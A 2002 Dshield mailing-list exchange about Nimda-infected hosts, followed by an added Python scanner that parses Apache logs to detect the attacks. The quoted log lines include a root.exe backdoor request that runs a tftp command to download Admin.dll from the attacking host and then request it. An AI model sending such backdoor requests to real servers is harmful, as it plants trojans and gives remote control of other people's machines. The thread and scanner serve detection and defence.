[Dshield] Something different in Apache logs

Clint Byrum cbyrum at erp.com
Fri Mar 1 08:45:15 GMT 2002


On Thu, 2002-02-28 at 19:03, Erick Brockway wrote:
> 
>     Normally a compromised machine scanning my webserver begins with:
> 
> 4.41.250.31 - - [27/Feb/2002:15:24:05 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 2701
> 4.41.250.31 - - [27/Feb/2002:15:24:41 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292
> etc.

Well.. these are infected.. and sort of compromised.. but they're still
automated.

>     NOW I'm seeing two new lines inserted:
> 4.41.250.31 - - [27/Feb/2002:15:24:39 -0800] "GET /scripts/root.exe?/c+tftp%20-i%204.41.250.31%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 2701
> 4.41.250.31 - - [27/Feb/2002:15:24:40 -0800] "GET /scripts/Admin.dll HTTP/1.0" 404 295

This looks like an attempt to put a trojan on your system and then run
it. Bad stuff indeed. If you had cleaned out Nimda, but left behind the
trojaned root.exe, well... Nimda would have reinfected you, but also
this little devil would work and they'd have remote control of your
machine.

>     Notice the first seems to point to a specific IP [204.41.250.31].
> Anybody seen this? There have been others I noticed pointing to one
> other IP in Spain. Is this the originator of the specific scan?
> 
-- 

------------------------------
Clint Byrum
ERP.COM 
(858) 707-7525
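As an added example (not part of this thread or either poster's work), a small Python scanner that parses access-log lines like the ones quoted above, decodes the command handed to root.exe, pulls out the tftp server and file name from the download command, and checks whether the dropped file was then requested from the same client. The sample log is constructed from the lines quoted in the thread; the field names are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample: the access-log lines quoted in the thread, rejoined
# onto single lines (the mail client had wrapped them).
SAMPLE_LOG = """\
4.41.250.31 - - [27/Feb/2002:15:24:05 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 2701
4.41.250.31 - - [27/Feb/2002:15:24:39 -0800] "GET /scripts/root.exe?/c+tftp%20-i%204.41.250.31%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 2701
4.41.250.31 - - [27/Feb/2002:15:24:40 -0800] "GET /scripts/Admin.dll HTTP/1.0" 404 295
4.41.250.31 - - [27/Feb/2002:15:24:41 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292
"""

# Apache common log format: client, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# The download described in the reply: tftp -i <server> GET <remote file> ...
TFTP_RE = re.compile(r'tftp\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+GET\s+(\S+)', re.IGNORECASE)

def classify(line):
    """Parse one log line; tag requests aimed at the Nimda-dropped root.exe shell."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, _method, target, status, _size = m.groups()
    path, _, query = target.partition("?")
    # The command rides in the query string: '+' is a space, the rest is percent-encoded.
    cmd = unquote(query.replace("+", " "))
    ev = {"client": client, "time": ts, "path": path, "status": int(status), "cmd": cmd, "kind": None}
    if path.lower().endswith(("/root.exe", "/cmd.exe")):
        tftp = TFTP_RE.search(cmd)
        if tftp:
            ev.update(kind="tftp_drop", tftp_server=tftp.group(1), dropped_file=tftp.group(2))
        else:
            ev["kind"] = "cmd_probe"
        # HTTP 200 means the shell answered: root.exe is still present on the host.
        ev["backdoor_present"] = ev["status"] == 200
    return ev

def scan(text):
    """Classify every line, then link each tftp drop to later requests for the dropped file."""
    events = [ev for ev in map(classify, text.splitlines()) if ev]
    for i, d in enumerate(events):
        if d["kind"] != "tftp_drop":
            continue
        suffix = "/" + d["dropped_file"].lower()
        runs = [ev for ev in events[i + 1:]
                if ev["client"] == d["client"] and ev["path"].lower().endswith(suffix)]
        d["exec_attempted"] = bool(runs)           # dropped file was requested afterwards
        d["executed"] = any(ev["status"] == 200 for ev in runs)  # ...and the server served it
    return events, [ev for ev in events if ev["kind"] == "tftp_drop"]
```

On the sample, the first root.exe probe returns 200 (the backdoor answered), the tftp drop names 4.41.250.31 as the server and Admin.dll as the file, and the follow-on GET /scripts/Admin.dll is recorded as attempted but not served (404).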